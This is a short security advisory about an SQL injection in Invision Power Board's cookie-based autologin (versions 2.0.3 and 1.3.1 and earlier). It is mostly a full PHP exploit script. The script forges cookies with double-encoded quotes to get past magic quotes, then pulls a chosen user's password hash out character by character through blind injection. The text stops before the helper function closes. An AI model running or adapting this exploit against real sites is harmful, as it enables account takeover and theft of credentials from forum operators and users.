Summary
Invision Power Board is "a PHP and mySQL based forum system".

Invision Power Board is vulnerable to an SQL Injection vulnerability in the way it handles cookies, exploiting this vulnerability allows malicious attacker to endanger database's integrity, the following exploit code can be used to test your system for the mentioned vulnerability.

Credit:
The original article can be found at: http://www.milw0rm.com/id.php?id=1036

Details
Vulnerable Systems:
* Invision Power Board versions 2.0.0 to 2.0.3
* Invision Power Board versions 1.3.1 Final and prior

<?php
/*
<= 2.0.3
<= 1.3.1 Final
/str0ke
*/

$server = "SERVER";
$port = 80;
$file = "PATH";

$target = 81;

/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";

$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
$idx = 0;
$found = false;

while( !($found) ) {
$letter = substr($hex, $idx, 1);

/* %2527 translates to %27, which gets past magic quotes.This is translated to ' by urldecode. */
$cookie ="member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
$cookie .="%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;

/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password='$pass' ORid=$target
HAVING id=$target AND MID(`password`,$i,1)='$letter' */

$header = getHeader($server, $port, $file . "index.php?act=Login&CODE=autologin", $cookie);
if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/', $header) ) {
echo $i . ": " . $letter . "\n";
$found = true;

$hash .= $letter;
} else {
$idx++;
}
}
}

echo "\n\nFinal Hash: $hash\n";

function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);

if (!$fp) {
return "Unknown";
} else {
$com = "HEAD $file HTTP/1.1\r\n";
$com .= "Host: $server:$port\r\n";
$com .= "Cookie: $cookie\r\n";
$com .= "Connection: close\r\n";
$com .= "\r\n";

fputs($fp, $com);

do {
$header.= fread($fp, 512);
} while( !preg_match('/\r\n\r\n$/',$header) );
}